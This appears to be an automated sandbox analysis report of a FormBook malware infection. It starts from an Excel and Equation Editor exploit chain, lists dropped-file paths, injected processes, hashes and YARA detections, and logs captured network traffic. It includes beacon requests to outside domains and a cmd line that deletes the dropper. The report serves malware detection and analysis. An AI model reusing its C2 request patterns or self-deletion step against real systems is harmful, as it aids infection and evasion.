75 67 67 65 73 74 3f 73 65 61
                                                                                                                                                                                                    Data Ascii: 9eb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>spinecompanion.com</title> <link rel="stylesheet" type="text/css" href="index-0dde0eb2.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> </head> <body> <div class="ParkingPage-root_mev2c "><main class="OldStatic-root_1AqEZ Parking-root_VsLjY"><div class="OldStatic-wrapper_3yq7Z"><article class="Parking-content_2yWLw"><h1 class="OldStatic-title_mf0rp">This domain name has been registered with Gandi.net</h1><div class="OldStatic-text_1fmcV Parking-text_FGDjM"><p><a href="https://whois.gandi.net/en/results?search=spinecompanion.com"><strong>View the WHOIS data for spinecompanion.com</strong></a> to see the domains public registration information.</p></div><div class="Parking-positionbox__QU83"><div class="Parking-outerbox_35Sc9"><p class="Parking-borderbox_2Uyzf"><a href="https://shop.gandi.net/en/domain/suggest?sea


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    3192.168.2.224916967.199.248.1280C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.602123022 CEST241OUTGET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1
                                                                                                                                                                                                    Host: www.doodstore.net
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Jun 11, 2021 08:05:26.753315926 CEST242INHTTP/1.1 302 Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 11 Jun 2021 06:05:26 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Set-Cookie: anon_u=cHN1X19kM2E2MmI3MC1mMDBlLTQyOWItYWE0Yy0wYjRkZGRkOTM1YzI=|1623391526|4719f7e6649abaa1b7b603db567e5e5150de6544; Domain=bitly.com; expires=Wed, 08 Dec 2021 06:05:26 GMT; httponly; Path=/; secure
                                                                                                                                                                                                    Strict-Transport-Security: max-age=1209600
                                                                                                                                                                                                    Location: https://bitly.com/pages/landing/branded-short-domains-powered-by-bitly?bsd=doodstore.net
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                    P3p: CP="CAO PSA OUR"
                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 2508 Parent PID: 584

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:02:38
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                    Imagebase:0x13f4a0000
                                                                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: EQNEDT32.EXE PID: 2988 Parent PID: 584

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:00
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:543304 bytes
                                                                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: vbc.exe PID: 3068 Parent PID: 2988

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:02
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:225177 bytes
                                                                                                                                                                                                    MD5 hash:116E736BA00FCA4B8499C4DF00796454
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 28%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Analysis Process: vbc.exe PID: 2476 Parent PID: 3068

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:03
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:225177 bytes
                                                                                                                                                                                                    MD5 hash:116E736BA00FCA4B8499C4DF00796454
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Analysis Process: explorer.exe PID: 1388 Parent PID: 2476

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:07
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: raserver.exe PID: 2204 Parent PID: 1388

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:27
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                                                                    Imagebase:0xb40000
                                                                                                                                                                                                    File size:101888 bytes
                                                                                                                                                                                                    MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    Analysis Process: cmd.exe PID: 1664 Parent PID: 2204

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:31
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x4a480000
                                                                                                                                                                                                    File size:302592 bytes
                                                                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                    Reset < >